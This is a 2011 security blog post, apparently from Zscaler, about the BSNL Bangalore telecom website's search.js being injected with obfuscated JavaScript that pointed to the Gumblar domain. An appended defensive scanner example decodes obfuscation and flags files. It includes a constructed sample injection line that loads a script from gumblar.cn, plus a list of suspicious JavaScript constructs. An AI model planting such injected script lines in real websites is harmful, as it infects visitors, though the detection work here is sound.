BSNL, Bangalore telecom district, has become yet another victim of poor website security and has been infected with malicious JavaScript code. This time, the code points to a malicious domain used by the well-known Gumblar botnet. Recently, my colleague Pradeep blogged about two Indian websites, ICWAI and KVGBANK, that were also infected with malicious content. The “http://www.bangaloretelecom.com” site provides information on the telecommunications services offered, telephone number search, online bill payment, etc. This is yet another example of a popular website in India that has been compromised. Here is a screenshot of the home page:

Interestingly, the home page itself does not contain malicious content; instead, the malicious JavaScript has been injected into one of the “.js” files used for searching the content of the website. If you look at the above screenshot, you will see a small search box. The attack is triggered when a visitor searches for anything using this functionality. Below is a screenshot of the search page the user is redirected to:

The source code of this page contains various “.js” files. The “search.js” file is infected with malicious JavaScript code. Here is the source code of that file:

The malicious JavaScript code is inserted at the bottom of this “.js” file. Here is the malicious content:

There are six different malicious JavaScript snippets, each obfuscated in a different way, but all ultimately point to the same malicious domain. Let’s investigate one of them:

The decoded script is shown below:

The above malicious code points to the malicious domain “gumblar.cn”, which was used by the Gumblar Trojan. Fortunately, the malicious domain has now been taken down.
Zscaler blocks the infected page (http://bangaloretelecom.com/search.js) rather than blocking the whole website. This example illustrates how malicious content can be filtered out while still allowing access to what is otherwise a legitimate site – an important approach, given the prevalence of such infections. Our recent posts highlight the fact that numerous popular Indian websites are struggling with proper application security controls.
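The detection side of this, as an added example that is not Zscaler's code or the page's own: a static scanner that peels the hex, `\x` and `String.fromCharCode` obfuscation layers described above and flags only the script (search.js here) that resolves to gumblar.cn, leaving the rest of the site untouched. The sample files, the `staticDecode`/`scanScript` functions and the "review" heuristic are constructed assumptions, not the real infected file.

```javascript
// Added example, not Zscaler's tooling: statically scan a site's .js files,
// decode the obfuscation layers common in Gumblar-style injections, and
// flag the one file that resolves to a known bad domain.
const BAD_DOMAINS = ['gumblar.cn']; // the domain named in the post

// Peel encoding layers without executing anything: unescape('%3C...') hex
// escapes, '\x3c' string escapes, and String.fromCharCode(103,117,...) arrays.
function staticDecode(src) {
  const hex = (_, h) => String.fromCharCode(parseInt(h, 16));
  return src
    .replace(/%([0-9a-f]{2})/gi, hex)
    .replace(/\\x([0-9a-f]{2})/gi, hex)
    .replace(/String\.fromCharCode\(([\d,\s]+)\)/g, (_, nums) =>
      nums.split(',').map(n => String.fromCharCode(parseInt(n, 10))).join(''));
}

// Constructs that a site's own search/UI code rarely needs together.
const SUSPICIOUS = [
  ['eval', /\beval\s*\(/],
  ['unescape', /\bunescape\s*\(/],
  ['document.write', /document\.write\s*\(/],
  ['fromCharCode', /String\.fromCharCode\s*\(/],
];

// Per-file verdict: 'block' when a bad domain appears after decoding,
// 'review' when two or more suspicious constructs appear, else 'clean'.
function scanScript(name, src) {
  const decoded = staticDecode(src).toLowerCase();
  const domains = BAD_DOMAINS.filter(d => decoded.includes(d));
  const constructs = SUSPICIOUS.filter(([, re]) => re.test(src)).map(([n]) => n);
  const verdict = domains.length ? 'block' : constructs.length >= 2 ? 'review' : 'clean';
  return { name, verdict, domains, constructs };
}

// Constructed sample files: a clean script and a search.js with an appended
// injection in the style described above (not the real infected file).
const SAMPLE_FILES = {
  'menu.js': "function openMenu(id){ document.getElementById(id).style.display='block'; }",
  'search.js': [
    "function doSearch(q){ location.href = '/search?q=' + encodeURIComponent(q); }",
    "document.write(unescape('%3Cscript src=%22http://%67%75%6D%62%6C%61%72%2E%63%6E/%22%3E%3C/script%3E'))",
    "var h=String.fromCharCode(103,117,109,98,108,97,114,46,99,110);",
  ].join('\n'),
};

function scanSite(files) {
  return Object.entries(files).map(([name, src]) => scanScript(name, src));
}
console.log(scanSite(SAMPLE_FILES)); // search.js -> 'block', menu.js -> 'clean'
```

The raw search.js text never contains the string "gumblar.cn"; it only appears after decoding, which is why a plain substring match on the file would miss it.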
Umesh

Posted on 02 March 2011. Tags: another, Bangalore, BSNL, Code, Injection, Malicious, Victim, Website
The above information is reprinted from and copyrighted © by Zscaler.